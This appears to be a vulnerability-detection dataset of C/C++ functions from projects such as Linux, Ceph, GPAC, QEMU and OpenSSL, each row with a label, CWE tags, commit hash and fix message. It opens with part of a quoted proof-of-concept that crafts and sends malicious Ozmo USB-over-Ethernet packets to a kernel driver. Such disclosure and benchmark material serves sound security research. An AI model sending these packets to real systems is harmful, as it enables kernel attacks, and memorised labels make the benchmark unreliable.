.pkt_num = htole32(0)
},
.oz_elt = {
.type = OZ_ELT_CONNECT_REQ,
.length = sizeof(struct oz_elt_connect_req)
},
.oz_elt_connect_req = {
.mode = 0,
.resv1 = {0},
.pd_info = 0,
.session_id = 0,
.presleep = 35,
.ms_isoc_latency = 0,
.host_vendor = 0,
.keep_alive = 0,
.apps = htole16((1 << OZ_APPID_USB) | 0x1),
.max_len_div16 = 0,
.ms_per_isoc = 0,
.up_audio_buf = 0,
.ms_per_elt = 0
}
};
struct {
struct ether_header ether_header;
struct oz_hdr oz_hdr;
struct oz_elt oz_elt;
struct oz_get_desc_rsp oz_get_desc_rsp;
} __packed pwn_packet = {
.ether_header = {
.ether_type = htons(OZ_ETHERTYPE),
.ether_shost = { src_mac[0], src_mac[1], src_mac[2], src_mac[3], src_mac[4], src_mac[5] },
.ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] }
},
.oz_hdr = {
.control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION << OZ_VERSION_SHIFT),
.last_pkt_num = 0,
.pkt_num = htole32(1)
},
.oz_elt = {
.type = OZ_ELT_APP_DATA,
.length = sizeof(struct oz_get_desc_rsp)
},
.oz_get_desc_rsp = {
.app_id = OZ_APPID_USB,
.elt_seq_num = 0,
.type = OZ_GET_DESC_RSP,
.req_id = 0,
.offset = htole16(2),
.total_size = htole16(1),
.rcode = 0,
.data = {0}
}
};
struct sockaddr_ll socket_address = {
.sll_ifindex = interface_index,
.sll_halen = ETH_ALEN,
.sll_addr = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] }
};
if (sendto(sockfd, &connect_packet, sizeof(connect_packet), 0, (struct sockaddr *)&socket_address, sizeof(socket_address)) < 0) {
perror("sendto");
return 1;
}
usleep(300000);
if (sendto(sockfd, &pwn_packet, sizeof(pwn_packet), 0, (struct sockaddr *)&socket_address, sizeof(socket_address)) < 0) {
perror("sendto");
return 1;
}
return 0;
}
Signed-off-by: Jason A. Donenfeld <[email protected]>
Acked-by: Dan Carpenter <[email protected]>
Cc: stable <[email protected]>
Signed-off-by: Greg Kroah-Hartman <[email protected]>
|
void topology_set_thermal_pressure(const struct cpumask *cpus,
unsigned long th_pressure)
{
int cpu;
for_each_cpu(cpu, cpus)
WRITE_ONCE(per_cpu(thermal_pressure, cpu), th_pressure);
}
| 0 |
[
"CWE-787"
] |
linux
|
aa838896d87af561a33ecefea1caa4c15a68bc47
| 268,566,893,496,510,670,000,000,000,000,000,000,000 | 8 |
drivers core: Use sysfs_emit and sysfs_emit_at for show(device *...) functions
Convert the various sprintf fmaily calls in sysfs device show functions
to sysfs_emit and sysfs_emit_at for PAGE_SIZE buffer safety.
Done with:
$ spatch -sp-file sysfs_emit_dev.cocci --in-place --max-width=80 .
And cocci script:
$ cat sysfs_emit_dev.cocci
@@
identifier d_show;
identifier dev, attr, buf;
@@
ssize_t d_show(struct device *dev, struct device_attribute *attr, char *buf)
{
<...
return
- sprintf(buf,
+ sysfs_emit(buf,
...);
...>
}
@@
identifier d_show;
identifier dev, attr, buf;
@@
ssize_t d_show(struct device *dev, struct device_attribute *attr, char *buf)
{
<...
return
- snprintf(buf, PAGE_SIZE,
+ sysfs_emit(buf,
...);
...>
}
@@
identifier d_show;
identifier dev, attr, buf;
@@
ssize_t d_show(struct device *dev, struct device_attribute *attr, char *buf)
{
<...
return
- scnprintf(buf, PAGE_SIZE,
+ sysfs_emit(buf,
...);
...>
}
@@
identifier d_show;
identifier dev, attr, buf;
expression chr;
@@
ssize_t d_show(struct device *dev, struct device_attribute *attr, char *buf)
{
<...
return
- strcpy(buf, chr);
+ sysfs_emit(buf, chr);
...>
}
@@
identifier d_show;
identifier dev, attr, buf;
identifier len;
@@
ssize_t d_show(struct device *dev, struct device_attribute *attr, char *buf)
{
<...
len =
- sprintf(buf,
+ sysfs_emit(buf,
...);
...>
return len;
}
@@
identifier d_show;
identifier dev, attr, buf;
identifier len;
@@
ssize_t d_show(struct device *dev, struct device_attribute *attr, char *buf)
{
<...
len =
- snprintf(buf, PAGE_SIZE,
+ sysfs_emit(buf,
...);
...>
return len;
}
@@
identifier d_show;
identifier dev, attr, buf;
identifier len;
@@
ssize_t d_show(struct device *dev, struct device_attribute *attr, char *buf)
{
<...
len =
- scnprintf(buf, PAGE_SIZE,
+ sysfs_emit(buf,
...);
...>
return len;
}
@@
identifier d_show;
identifier dev, attr, buf;
identifier len;
@@
ssize_t d_show(struct device *dev, struct device_attribute *attr, char *buf)
{
<...
- len += scnprintf(buf + len, PAGE_SIZE - len,
+ len += sysfs_emit_at(buf, len,
...);
...>
return len;
}
@@
identifier d_show;
identifier dev, attr, buf;
expression chr;
@@
ssize_t d_show(struct device *dev, struct device_attribute *attr, char *buf)
{
...
- strcpy(buf, chr);
- return strlen(buf);
+ return sysfs_emit(buf, chr);
}
Signed-off-by: Joe Perches <[email protected]>
Link: https://lore.kernel.org/r/3d033c33056d88bbe34d4ddb62afd05ee166ab9a.1600285923.git.joe@perches.com
Signed-off-by: Greg Kroah-Hartman <[email protected]>
|
void *genlmsg_put(struct sk_buff *skb, u32 portid, u32 seq,
const struct genl_family *family, int flags, u8 cmd)
{
struct nlmsghdr *nlh;
struct genlmsghdr *hdr;
nlh = nlmsg_put(skb, portid, seq, family->id, GENL_HDRLEN +
family->hdrsize, flags);
if (nlh == NULL)
return NULL;
hdr = nlmsg_data(nlh);
hdr->cmd = cmd;
hdr->version = family->version;
hdr->reserved = 0;
return (char *) hdr + GENL_HDRLEN;
}
| 0 |
[
"CWE-399",
"CWE-401"
] |
linux
|
ceabee6c59943bdd5e1da1a6a20dc7ee5f8113a2
| 51,053,124,899,783,490,000,000,000,000,000,000,000 | 18 |
genetlink: Fix a memory leak on error path
In genl_register_family(), when idr_alloc() fails,
we forget to free the memory we possibly allocate for
family->attrbuf.
Reported-by: Hulk Robot <[email protected]>
Fixes: 2ae0f17df1cd ("genetlink: use idr to track families")
Signed-off-by: YueHaibing <[email protected]>
Reviewed-by: Kirill Tkhai <[email protected]>
Signed-off-by: David S. Miller <[email protected]>
|
static int _assign_xshm(Display *dpy, XErrorEvent *error) {
cimg::unused(dpy,error);
cimg::X11_attr().is_shm_enabled = false;
return 0;
| 0 |
[
"CWE-125"
] |
CImg
|
10af1e8c1ad2a58a0a3342a856bae63e8f257abb
| 126,894,120,012,542,270,000,000,000,000,000,000,000 | 5 |
Fix other issues in 'CImg<T>::load_bmp()'.
|
void MonClient::handle_config(MConfig *m)
{
ldout(cct,10) << __func__ << " " << *m << dendl;
finisher.queue(new LambdaContext([this, m](int r) {
cct->_conf.set_mon_vals(cct, m->config, config_cb);
if (config_notify_cb) {
config_notify_cb();
}
m->put();
}));
got_config = true;
map_cond.notify_all();
}
| 0 |
[
"CWE-294"
] |
ceph
|
6c14c2fb5650426285428dfe6ca1597e5ea1d07d
| 53,731,759,576,434,030,000,000,000,000,000,000,000 | 13 |
mon/MonClient: bring back CEPHX_V2 authorizer challenges
Commit c58c5754dfd2 ("msg/async/ProtocolV1: use AuthServer and
AuthClient") introduced a backwards compatibility issue into msgr1.
To fix it, commit 321548010578 ("mon/MonClient: skip CEPHX_V2
challenge if client doesn't support it") set out to skip authorizer
challenges for peers that don't support CEPHX_V2. However, it
made it so that authorizer challenges are skipped for all peers in
both msgr1 and msgr2 cases, effectively disabling the protection
against replay attacks that was put in place in commit f80b848d3f83
("auth/cephx: add authorizer challenge", CVE-2018-1128).
This is because con->get_features() always returns 0 at that
point. In msgr1 case, the peer shares its features along with the
authorizer, but while they are available in connect_msg.features they
aren't assigned to con until ProtocolV1::open(). In msgr2 case, the
peer doesn't share its features until much later (in CLIENT_IDENT
frame, i.e. after the authentication phase). The result is that
!CEPHX_V2 branch is taken in all cases and replay attack protection
is lost.
Only clusters with cephx_service_require_version set to 2 on the
service daemons would not be silently downgraded. But, since the
default is 1 and there are no reports of looping on BADAUTHORIZER
faults, I'm pretty sure that no one has ever done that. Note that
cephx_require_version set to 2 would have no effect even though it
is supposed to be stronger than cephx_service_require_version
because MonClient::handle_auth_request() didn't check it.
To fix:
- for msgr1, check connect_msg.features (as was done before commit
c58c5754dfd2) and challenge if CEPHX_V2 is supported. Together
with two preceding patches that resurrect proper cephx_* option
handling in msgr1, this covers both "I want old clients to work"
and "I wish to require better authentication" use cases.
- for msgr2, don't check anything and always challenge. CEPHX_V2
predates msgr2, anyone speaking msgr2 must support it.
Signed-off-by: Ilya Dryomov <[email protected]>
(cherry picked from commit 4a82c72e3bdddcb625933e83af8b50a444b961f1)
|
GF_Err adaf_box_write(GF_Box *s, GF_BitStream *bs)
{
GF_Err e;
GF_AdobeDRMAUFormatBox *ptr = (GF_AdobeDRMAUFormatBox *) s;
if (!s) return GF_BAD_PARAM;
e = gf_isom_full_box_write(s, bs);
if (e) return e;
gf_bs_write_u8(bs, ptr->selective_enc);
gf_bs_write_u8(bs, 0x0);
gf_bs_write_u8(bs, ptr->IV_length);
return GF_OK;
}
| 0 |
[
"CWE-703"
] |
gpac
|
f19668964bf422cf5a63e4dbe1d3c6c75edadcbb
| 155,156,898,561,937,200,000,000,000,000,000,000,000 | 13 |
fixed #1879
|
static bool mg_sock_would_block(void) {
int err = MG_SOCK_ERRNO;
return err == EINPROGRESS || err == EWOULDBLOCK
#ifndef WINCE
|| err == EAGAIN || err == EINTR
#endif
#if defined(_WIN32) && MG_ENABLE_WINSOCK
|| err == WSAEINTR || err == WSAEWOULDBLOCK
#endif
;
}
| 0 |
[
"CWE-552"
] |
mongoose
|
c65c8fdaaa257e0487ab0aaae9e8f6b439335945
| 206,569,166,467,228,260,000,000,000,000,000,000,000 | 11 |
Protect against the directory traversal in mg_upload()
|
static void interface_set_mm_time(QXLInstance *sin, uint32_t mm_time)
{
PCIQXLDevice *qxl = container_of(sin, PCIQXLDevice, ssd.qxl);
if (!qemu_spice_display_is_running(&qxl->ssd)) {
return;
}
trace_qxl_interface_set_mm_time(qxl->id, mm_time);
qxl->shadow_rom.mm_clock = cpu_to_le32(mm_time);
qxl->rom->mm_clock = cpu_to_le32(mm_time);
qxl_rom_set_dirty(qxl);
}
| 0 |
[
"CWE-476"
] |
qemu
|
d52680fc932efb8a2f334cc6993e705ed1e31e99
| 320,971,296,585,096,780,000,000,000,000,000,000,000 | 13 |
qxl: check release info object
When releasing spice resources in release_resource() routine,
if release info object 'ext.info' is null, it leads to null
pointer dereference. Add check to avoid it.
Reported-by: Bugs SysSec <[email protected]>
Signed-off-by: Prasad J Pandit <[email protected]>
Message-id: [email protected]
Signed-off-by: Gerd Hoffmann <[email protected]>
|
static int ZEND_FASTCALL ZEND_IS_NOT_EQUAL_SPEC_VAR_CONST_HANDLER(ZEND_OPCODE_HANDLER_ARGS)
{
zend_op *opline = EX(opline);
zend_free_op free_op1;
zval *result = &EX_T(opline->result.u.var).tmp_var;
compare_function(result,
_get_zval_ptr_var(&opline->op1, EX(Ts), &free_op1 TSRMLS_CC),
&opline->op2.u.constant TSRMLS_CC);
ZVAL_BOOL(result, (Z_LVAL_P(result) != 0));
if (free_op1.var) {zval_ptr_dtor(&free_op1.var);};
ZEND_VM_NEXT_OPCODE();
}
| 0 |
[] |
php-src
|
ce96fd6b0761d98353761bf78d5bfb55291179fd
| 227,168,183,763,719,300,000,000,000,000,000,000,000 | 14 |
- fix #39863, do not accept paths with NULL in them. See http://news.php.net/php.internals/50191, trunk will have the patch later (adding a macro and/or changing (some) APIs. Patch by Rasmus
|
static int check_packet_access(struct bpf_verifier_env *env, u32 regno, int off,
int size, bool zero_size_allowed)
{
struct bpf_reg_state *regs = cur_regs(env);
struct bpf_reg_state *reg = ®s[regno];
int err;
/* We may have added a variable offset to the packet pointer; but any
* reg->range we have comes after that. We are only checking the fixed
* offset.
*/
/* We don't allow negative numbers, because we aren't tracking enough
* detail to prove they're safe.
*/
if (reg->smin_value < 0) {
verbose(env, "R%d min value is negative, either use unsigned index or do a if (index >=0) check.\n",
regno);
return -EACCES;
}
err = __check_packet_access(env, regno, off, size, zero_size_allowed);
if (err) {
verbose(env, "R%d offset is outside of the packet\n", regno);
return err;
}
/* __check_packet_access has made sure "off + size - 1" is within u16.
* reg->umax_value can't be bigger than MAX_PACKET_OFF which is 0xffff,
* otherwise find_good_pkt_pointers would have refused to set range info
* that __check_packet_access would have rejected this pkt access.
* Therefore, "off + reg->umax_value + size - 1" won't overflow u32.
*/
env->prog->aux->max_pkt_offset =
max_t(u32, env->prog->aux->max_pkt_offset,
off + reg->umax_value + size - 1);
return err;
}
| 0 |
[
"CWE-703",
"CWE-189"
] |
linux
|
979d63d50c0c0f7bc537bf821e056cc9fe5abd38
| 97,289,006,539,524,080,000,000,000,000,000,000,000 | 38 |
bpf: prevent out of bounds speculation on pointer arithmetic
Jann reported that the original commit back in b2157399cc98
("bpf: prevent out-of-bounds speculation") was not sufficient
to stop CPU from speculating out of bounds memory access:
While b2157399cc98 only focussed on masking array map access
for unprivileged users for tail calls and data access such
that the user provided index gets sanitized from BPF program
and syscall side, there is still a more generic form affected
from BPF programs that applies to most maps that hold user
data in relation to dynamic map access when dealing with
unknown scalars or "slow" known scalars as access offset, for
example:
- Load a map value pointer into R6
- Load an index into R7
- Do a slow computation (e.g. with a memory dependency) that
loads a limit into R8 (e.g. load the limit from a map for
high latency, then mask it to make the verifier happy)
- Exit if R7 >= R8 (mispredicted branch)
- Load R0 = R6[R7]
- Load R0 = R6[R0]
For unknown scalars there are two options in the BPF verifier
where we could derive knowledge from in order to guarantee
safe access to the memory: i) While </>/<=/>= variants won't
allow to derive any lower or upper bounds from the unknown
scalar where it would be safe to add it to the map value
pointer, it is possible through ==/!= test however. ii) another
option is to transform the unknown scalar into a known scalar,
for example, through ALU ops combination such as R &= <imm>
followed by R |= <imm> or any similar combination where the
original information from the unknown scalar would be destroyed
entirely leaving R with a constant. The initial slow load still
precedes the latter ALU ops on that register, so the CPU
executes speculatively from that point. Once we have the known
scalar, any compare operation would work then. A third option
only involving registers with known scalars could be crafted
as described in [0] where a CPU port (e.g. Slow Int unit)
would be filled with many dependent computations such that
the subsequent condition depending on its outcome has to wait
for evaluation on its execution port and thereby executing
speculatively if the speculated code can be scheduled on a
different execution port, or any other form of mistraining
as described in [1], for example. Given this is not limited
to only unknown scalars, not only map but also stack access
is affected since both is accessible for unprivileged users
and could potentially be used for out of bounds access under
speculation.
In order to prevent any of these cases, the verifier is now
sanitizing pointer arithmetic on the offset such that any
out of bounds speculation would be masked in a way where the
pointer arithmetic result in the destination register will
stay unchanged, meaning offset masked into zero similar as
in array_index_nospec() case. With regards to implementation,
there are three options that were considered: i) new insn
for sanitation, ii) push/pop insn and sanitation as inlined
BPF, iii) reuse of ax register and sanitation as inlined BPF.
Option i) has the downside that we end up using from reserved
bits in the opcode space, but also that we would require
each JIT to emit masking as native arch opcodes meaning
mitigation would have slow adoption till everyone implements
it eventually which is counter-productive. Option ii) and iii)
have both in common that a temporary register is needed in
order to implement the sanitation as inlined BPF since we
are not allowed to modify the source register. While a push /
pop insn in ii) would be useful to have in any case, it
requires once again that every JIT needs to implement it
first. While possible, amount of changes needed would also
be unsuitable for a -stable patch. Therefore, the path which
has fewer changes, less BPF instructions for the mitigation
and does not require anything to be changed in the JITs is
option iii) which this work is pursuing. The ax register is
already mapped to a register in all JITs (modulo arm32 where
it's mapped to stack as various other BPF registers there)
and used in constant blinding for JITs-only so far. It can
be reused for verifier rewrites under certain constraints.
The interpreter's tmp "register" has therefore been remapped
into extending the register set with hidden ax register and
reusing that for a number of instructions that needed the
prior temporary variable internally (e.g. div, mod). This
allows for zero increase in stack space usage in the interpreter,
and enables (restricted) generic use in rewrites otherwise as
long as such a patchlet does not make use of these instructions.
The sanitation mask is dynamic and relative to the offset the
map value or stack pointer currently holds.
There are various cases that need to be taken under consideration
for the masking, e.g. such operation could look as follows:
ptr += val or val += ptr or ptr -= val. Thus, the value to be
sanitized could reside either in source or in destination
register, and the limit is different depending on whether
the ALU op is addition or subtraction and depending on the
current known and bounded offset. The limit is derived as
follows: limit := max_value_size - (smin_value + off). For
subtraction: limit := umax_value + off. This holds because
we do not allow any pointer arithmetic that would
temporarily go out of bounds or would have an unknown
value with mixed signed bounds where it is unclear at
verification time whether the actual runtime value would
be either negative or positive. For example, we have a
derived map pointer value with constant offset and bounded
one, so limit based on smin_value works because the verifier
requires that statically analyzed arithmetic on the pointer
must be in bounds, and thus it checks if resulting
smin_value + off and umax_value + off is still within map
value bounds at time of arithmetic in addition to time of
access. Similarly, for the case of stack access we derive
the limit as follows: MAX_BPF_STACK + off for subtraction
and -off for the case of addition where off := ptr_reg->off +
ptr_reg->var_off.value. Subtraction is a special case for
the masking which can be in form of ptr += -val, ptr -= -val,
or ptr -= val. In the first two cases where we know that
the value is negative, we need to temporarily negate the
value in order to do the sanitation on a positive value
where we later swap the ALU op, and restore original source
register if the value was in source.
The sanitation of pointer arithmetic alone is still not fully
sufficient as is, since a scenario like the following could
happen ...
PTR += 0x1000 (e.g. K-based imm)
PTR -= BIG_NUMBER_WITH_SLOW_COMPARISON
PTR += 0x1000
PTR -= BIG_NUMBER_WITH_SLOW_COMPARISON
[...]
... which under speculation could end up as ...
PTR += 0x1000
PTR -= 0 [ truncated by mitigation ]
PTR += 0x1000
PTR -= 0 [ truncated by mitigation ]
[...]
... and therefore still access out of bounds. To prevent such
case, the verifier is also analyzing safety for potential out
of bounds access under speculative execution. Meaning, it is
also simulating pointer access under truncation. We therefore
"branch off" and push the current verification state after the
ALU operation with known 0 to the verification stack for later
analysis. Given the current path analysis succeeded it is
likely that the one under speculation can be pruned. In any
case, it is also subject to existing complexity limits and
therefore anything beyond this point will be rejected. In
terms of pruning, it needs to be ensured that the verification
state from speculative execution simulation must never prune
a non-speculative execution path, therefore, we mark verifier
state accordingly at the time of push_stack(). If verifier
detects out of bounds access under speculative execution from
one of the possible paths that includes a truncation, it will
reject such program.
Given we mask every reg-based pointer arithmetic for
unprivileged programs, we've been looking into how it could
affect real-world programs in terms of size increase. As the
majority of programs are targeted for privileged-only use
case, we've unconditionally enabled masking (with its alu
restrictions on top of it) for privileged programs for the
sake of testing in order to check i) whether they get rejected
in its current form, and ii) by how much the number of
instructions and size will increase. We've tested this by
using Katran, Cilium and test_l4lb from the kernel selftests.
For Katran we've evaluated balancer_kern.o, Cilium bpf_lxc.o
and an older test object bpf_lxc_opt_-DUNKNOWN.o and l4lb
we've used test_l4lb.o as well as test_l4lb_noinline.o. We
found that none of the programs got rejected by the verifier
with this change, and that impact is rather minimal to none.
balancer_kern.o had 13,904 bytes (1,738 insns) xlated and
7,797 bytes JITed before and after the change. Most complex
program in bpf_lxc.o had 30,544 bytes (3,817 insns) xlated
and 18,538 bytes JITed before and after and none of the other
tail call programs in bpf_lxc.o had any changes either. For
the older bpf_lxc_opt_-DUNKNOWN.o object we found a small
increase from 20,616 bytes (2,576 insns) and 12,536 bytes JITed
before to 20,664 bytes (2,582 insns) and 12,558 bytes JITed
after the change. Other programs from that object file had
similar small increase. Both test_l4lb.o had no change and
remained at 6,544 bytes (817 insns) xlated and 3,401 bytes
JITed and for test_l4lb_noinline.o constant at 5,080 bytes
(634 insns) xlated and 3,313 bytes JITed. This can be explained
in that LLVM typically optimizes stack based pointer arithmetic
by using K-based operations and that use of dynamic map access
is not overly frequent. However, in future we may decide to
optimize the algorithm further under known guarantees from
branch and value speculation. Latter seems also unclear in
terms of prediction heuristics that today's CPUs apply as well
as whether there could be collisions in e.g. the predictor's
Value History/Pattern Table for triggering out of bounds access,
thus masking is performed unconditionally at this point but could
be subject to relaxation later on. We were generally also
brainstorming various other approaches for mitigation, but the
blocker was always lack of available registers at runtime and/or
overhead for runtime tracking of limits belonging to a specific
pointer. Thus, we found this to be minimally intrusive under
given constraints.
With that in place, a simple example with sanitized access on
unprivileged load at post-verification time looks as follows:
# bpftool prog dump xlated id 282
[...]
28: (79) r1 = *(u64 *)(r7 +0)
29: (79) r2 = *(u64 *)(r7 +8)
30: (57) r1 &= 15
31: (79) r3 = *(u64 *)(r0 +4608)
32: (57) r3 &= 1
33: (47) r3 |= 1
34: (2d) if r2 > r3 goto pc+19
35: (b4) (u32) r11 = (u32) 20479 |
36: (1f) r11 -= r2 | Dynamic sanitation for pointer
37: (4f) r11 |= r2 | arithmetic with registers
38: (87) r11 = -r11 | containing bounded or known
39: (c7) r11 s>>= 63 | scalars in order to prevent
40: (5f) r11 &= r2 | out of bounds speculation.
41: (0f) r4 += r11 |
42: (71) r4 = *(u8 *)(r4 +0)
43: (6f) r4 <<= r1
[...]
For the case where the scalar sits in the destination register
as opposed to the source register, the following code is emitted
for the above example:
[...]
16: (b4) (u32) r11 = (u32) 20479
17: (1f) r11 -= r2
18: (4f) r11 |= r2
19: (87) r11 = -r11
20: (c7) r11 s>>= 63
21: (5f) r2 &= r11
22: (0f) r2 += r0
23: (61) r0 = *(u32 *)(r2 +0)
[...]
JIT blinding example with non-conflicting use of r10:
[...]
d5: je 0x0000000000000106 _
d7: mov 0x0(%rax),%edi |
da: mov $0xf153246,%r10d | Index load from map value and
e0: xor $0xf153259,%r10 | (const blinded) mask with 0x1f.
e7: and %r10,%rdi |_
ea: mov $0x2f,%r10d |
f0: sub %rdi,%r10 | Sanitized addition. Both use r10
f3: or %rdi,%r10 | but do not interfere with each
f6: neg %r10 | other. (Neither do these instructions
f9: sar $0x3f,%r10 | interfere with the use of ax as temp
fd: and %r10,%rdi | in interpreter.)
100: add %rax,%rdi |_
103: mov 0x0(%rdi),%eax
[...]
Tested that it fixes Jann's reproducer, and also checked that test_verifier
and test_progs suite with interpreter, JIT and JIT with hardening enabled
on x86-64 and arm64 runs successfully.
[0] Speculose: Analyzing the Security Implications of Speculative
Execution in CPUs, Giorgi Maisuradze and Christian Rossow,
https://arxiv.org/pdf/1801.04084.pdf
[1] A Systematic Evaluation of Transient Execution Attacks and
Defenses, Claudio Canella, Jo Van Bulck, Michael Schwarz,
Moritz Lipp, Benjamin von Berg, Philipp Ortner, Frank Piessens,
Dmitry Evtyushkin, Daniel Gruss,
https://arxiv.org/pdf/1811.05441.pdf
Fixes: b2157399cc98 ("bpf: prevent out-of-bounds speculation")
Reported-by: Jann Horn <[email protected]>
Signed-off-by: Daniel Borkmann <[email protected]>
Acked-by: Alexei Starovoitov <[email protected]>
Signed-off-by: Alexei Starovoitov <[email protected]>
|
int rosecmpm(rose_address *addr1, rose_address *addr2, unsigned short mask)
{
unsigned int i, j;
if (mask > 10)
return 1;
for (i = 0; i < mask; i++) {
j = i / 2;
if ((i % 2) != 0) {
if ((addr1->rose_addr[j] & 0x0F) != (addr2->rose_addr[j] & 0x0F))
return 1;
} else {
if ((addr1->rose_addr[j] & 0xF0) != (addr2->rose_addr[j] & 0xF0))
return 1;
}
}
return 0;
}
| 0 |
[
"CWE-200"
] |
linux-2.6
|
17ac2e9c58b69a1e25460a568eae1b0dc0188c25
| 249,174,581,242,216,770,000,000,000,000,000,000,000 | 21 |
rose: Fix rose_getname() leak
rose_getname() can leak kernel memory to user.
Signed-off-by: Eric Dumazet <[email protected]>
Signed-off-by: David S. Miller <[email protected]>
|
bool AOClient::checkEvidenceAccess(AreaData *area)
{
switch(area->eviMod()) {
case AreaData::EvidenceMod::FFA:
return true;
case AreaData::EvidenceMod::CM:
case AreaData::EvidenceMod::HIDDEN_CM:
return checkAuth(ACLFlags.value("CM"));
case AreaData::EvidenceMod::MOD:
return authenticated;
default:
return false;
}
}
| 0 |
[
"CWE-703",
"CWE-129"
] |
akashi
|
5566cdfedddef1f219aee33477d9c9690bf2f78b
| 312,630,285,928,534,070,000,000,000,000,000,000,000 | 14 |
Fix out of bounds crash on evidence
|
GF_Err stsd_box_read(GF_Box *s, GF_BitStream *bs)
{
ISOM_DECREASE_SIZE(s, 4)
gf_bs_read_u32(bs);
return gf_isom_box_array_read_ex(s, bs, stsd_on_child_box, GF_ISOM_BOX_TYPE_STSD);
}
| 0 |
[
"CWE-787"
] |
gpac
|
388ecce75d05e11fc8496aa4857b91245007d26e
| 149,310,596,729,448,550,000,000,000,000,000,000,000 | 7 |
fixed #1587
|
SRP_user_pwd *SRP_VBASE_get1_by_user(SRP_VBASE *vb, char *username)
{
SRP_user_pwd *user;
unsigned char digv[SHA_DIGEST_LENGTH];
unsigned char digs[SHA_DIGEST_LENGTH];
EVP_MD_CTX *ctxt = NULL;
if (vb == NULL)
return NULL;
if ((user = find_user(vb, username)) != NULL)
return srp_user_pwd_dup(user);
if ((vb->seed_key == NULL) ||
(vb->default_g == NULL) || (vb->default_N == NULL))
return NULL;
/* if the user is unknown we set parameters as well if we have a seed_key */
if ((user = SRP_user_pwd_new()) == NULL)
return NULL;
SRP_user_pwd_set_gN(user, vb->default_g, vb->default_N);
if (!SRP_user_pwd_set_ids(user, username, NULL))
goto err;
if (RAND_bytes(digv, SHA_DIGEST_LENGTH) <= 0)
goto err;
ctxt = EVP_MD_CTX_new();
EVP_DigestInit_ex(ctxt, EVP_sha1(), NULL);
EVP_DigestUpdate(ctxt, vb->seed_key, strlen(vb->seed_key));
EVP_DigestUpdate(ctxt, username, strlen(username));
EVP_DigestFinal_ex(ctxt, digs, NULL);
EVP_MD_CTX_free(ctxt);
ctxt = NULL;
if (SRP_user_pwd_set_sv_BN(user,
BN_bin2bn(digs, SHA_DIGEST_LENGTH, NULL),
BN_bin2bn(digv, SHA_DIGEST_LENGTH, NULL)))
return user;
err:
EVP_MD_CTX_free(ctxt);
SRP_user_pwd_free(user);
return NULL;
}
| 0 |
[
"CWE-399"
] |
openssl
|
380f18ed5f140e0ae1b68f3ab8f4f7c395658d9e
| 149,815,838,827,035,420,000,000,000,000,000,000,000 | 46 |
CVE-2016-0798: avoid memory leak in SRP
The SRP user database lookup method SRP_VBASE_get_by_user had confusing
memory management semantics; the returned pointer was sometimes newly
allocated, and sometimes owned by the callee. The calling code has no
way of distinguishing these two cases.
Specifically, SRP servers that configure a secret seed to hide valid
login information are vulnerable to a memory leak: an attacker
connecting with an invalid username can cause a memory leak of around
300 bytes per connection.
Servers that do not configure SRP, or configure SRP but do not configure
a seed are not vulnerable.
In Apache, the seed directive is known as SSLSRPUnknownUserSeed.
To mitigate the memory leak, the seed handling in SRP_VBASE_get_by_user
is now disabled even if the user has configured a seed.
Applications are advised to migrate to SRP_VBASE_get1_by_user. However,
note that OpenSSL makes no strong guarantees about the
indistinguishability of valid and invalid logins. In particular,
computations are currently not carried out in constant time.
Reviewed-by: Rich Salz <[email protected]>
|
int regulator_enable(struct regulator *regulator)
{
struct regulator_dev *rdev = regulator->rdev;
int ret = 0;
if (regulator->always_on)
return 0;
if (rdev->supply) {
ret = regulator_enable(rdev->supply);
if (ret != 0)
return ret;
}
mutex_lock(&rdev->mutex);
ret = _regulator_enable(rdev);
mutex_unlock(&rdev->mutex);
if (ret != 0 && rdev->supply)
regulator_disable(rdev->supply);
return ret;
}
| 0 |
[
"CWE-416"
] |
linux
|
60a2362f769cf549dc466134efe71c8bf9fbaaba
| 86,565,820,226,533,060,000,000,000,000,000,000,000 | 23 |
regulator: core: Fix regualtor_ena_gpio_free not to access pin after freeing
After freeing pin from regulator_ena_gpio_free, loop can access
the pin. So this patch fixes not to access pin after freeing.
Signed-off-by: Seung-Woo Kim <[email protected]>
Signed-off-by: Mark Brown <[email protected]>
|
static struct nfs4_lockdata *nfs4_alloc_lockdata(struct file_lock *fl,
struct nfs_open_context *ctx, struct nfs4_lock_state *lsp)
{
struct nfs4_lockdata *p;
struct inode *inode = lsp->ls_state->inode;
struct nfs_server *server = NFS_SERVER(inode);
p = kzalloc(sizeof(*p), GFP_KERNEL);
if (p == NULL)
return NULL;
p->arg.fh = NFS_FH(inode);
p->arg.fl = &p->fl;
p->arg.open_seqid = nfs_alloc_seqid(&lsp->ls_state->owner->so_seqid);
if (p->arg.open_seqid == NULL)
goto out_free;
p->arg.lock_seqid = nfs_alloc_seqid(&lsp->ls_seqid);
if (p->arg.lock_seqid == NULL)
goto out_free_seqid;
p->arg.lock_stateid = &lsp->ls_stateid;
p->arg.lock_owner.clientid = server->nfs_client->cl_clientid;
p->arg.lock_owner.id = lsp->ls_id.id;
p->res.lock_seqid = p->arg.lock_seqid;
p->lsp = lsp;
atomic_inc(&lsp->ls_count);
p->ctx = get_nfs_open_context(ctx);
memcpy(&p->fl, fl, sizeof(p->fl));
return p;
out_free_seqid:
nfs_free_seqid(p->arg.open_seqid);
out_free:
kfree(p);
return NULL;
}
| 0 |
[
"CWE-703"
] |
linux
|
dc0b027dfadfcb8a5504f7d8052754bf8d501ab9
| 67,316,169,948,848,040,000,000,000,000,000,000,000 | 34 |
NFSv4: Convert the open and close ops to use fmode
Signed-off-by: Trond Myklebust <[email protected]>
|
static krb5_tl_data *dup_tl_data(krb5_tl_data *tl)
{
krb5_tl_data *n;
n = (krb5_tl_data *) malloc(sizeof(krb5_tl_data));
if (n == NULL)
return NULL;
n->tl_data_contents = malloc(tl->tl_data_length);
if (n->tl_data_contents == NULL) {
free(n);
return NULL;
}
memcpy(n->tl_data_contents, tl->tl_data_contents, tl->tl_data_length);
n->tl_data_type = tl->tl_data_type;
n->tl_data_length = tl->tl_data_length;
n->tl_data_next = NULL;
return n;
}
| 0 |
[
"CWE-703"
] |
krb5
|
c5be6209311d4a8f10fda37d0d3f876c1b33b77b
| 282,873,506,446,365,240,000,000,000,000,000,000,000 | 18 |
Null pointer deref in kadmind [CVE-2012-1013]
The fix for #6626 could cause kadmind to dereference a null pointer if
a create-principal request contains no password but does contain the
KRB5_KDB_DISALLOW_ALL_TIX flag (e.g. "addprinc -randkey -allow_tix
name"). Only clients authorized to create principals can trigger the
